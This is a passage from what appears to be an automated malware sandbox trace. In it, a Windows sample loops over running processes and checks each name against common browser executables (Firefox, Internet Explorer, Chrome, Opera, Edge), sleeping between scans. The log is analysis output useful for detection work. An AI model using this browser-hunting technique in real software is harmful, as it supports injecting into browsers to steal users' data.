lpString2="opera.exe") returned -1 [0196.492] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.492] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0196.493] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0196.493] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0196.493] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0196.493] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0196.493] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0196.493] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0196.494] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0196.494] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0196.494] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0196.494] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="opera.exe") returned 1 [0196.494] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.494] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0196.494] CloseHandle (hObject=0xe8) returned 1 [0196.494] Sleep (dwMilliseconds=0x3e8) [0197.564] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0197.566] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.566] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0197.566] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0197.566] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0197.566] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0197.566] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0197.566] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0197.567] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0197.567] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0197.567] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0197.567] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0197.567] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0197.567] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0197.567] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0197.567] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0197.567] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0197.567] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0197.567] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.567] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.568] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0197.568] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0197.568] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0197.568] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0197.568] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.568] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0197.569] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0197.569] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0197.569] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0197.569] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0197.569] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.569] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.569] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0197.569] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0197.569] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0197.569] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0197.569] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.569] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0197.570] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0197.570] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0197.570] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0197.570] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0197.570] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.570] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0197.570] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0197.570] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0197.570] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0197.570] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0197.570] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.570] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0197.571] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0197.571] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0197.571] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0197.571] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0197.571] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.571] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0197.572] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0197.572] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0197.572] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0197.572] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0197.572] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.572] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.572] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.572] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.572] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.572] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0197.572] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.572] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.573] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.573] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.573] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.573] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0197.573] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.573] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.573] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.573] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.573] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.573] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0197.573] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.574] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.574] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.574] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.574] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.574] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0197.574] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.574] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.575] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.575] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.575] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.575] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0197.575] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.575] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0197.575] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0197.575] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0197.575] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0197.575] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0197.575] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.575] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.576] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.576] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.576] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.576] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0197.576] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.576] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.576] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.576] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.576] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.577] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0197.577] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.577] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0197.577] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0197.577] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0197.577] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0197.577] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0197.577] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.577] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0197.578] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0197.578] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0197.578] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0197.578] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0197.578] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.578] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0197.578] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0197.578] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0197.578] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0197.578] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0197.578] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.578] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.579] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.579] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.579] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.579] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0197.579] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.579] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0197.579] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0197.580] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0197.580] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0197.580] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0197.580] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.580] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0197.580] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0197.580] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0197.580] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0197.580] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0197.580] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.580] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0197.581] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0197.581] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0197.581] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0197.581] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0197.581] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.581] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0197.581] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0197.581] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0197.581] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0197.581] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0197.581] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.581] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0197.582] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0197.582] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0197.582] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0197.582] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0197.582] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.582] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0197.583] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0197.583] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0197.583] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0197.583] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0197.583] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.583] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0197.583] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0197.583] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0197.583] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0197.583] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0197.583] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.583] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0197.584] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0197.584] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0197.584] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0197.584] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0197.584] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.584] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0197.584] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0197.584] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0197.584] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0197.584] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0197.584] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.585] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0197.585] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0197.585] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0197.585] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0197.585] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0197.585] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.585] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0197.586] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0197.586] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0197.586] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0197.586] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0197.586] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.586] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0197.586] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0197.586] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0197.586] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0197.586] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0197.586] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.586] Process32Next (in: 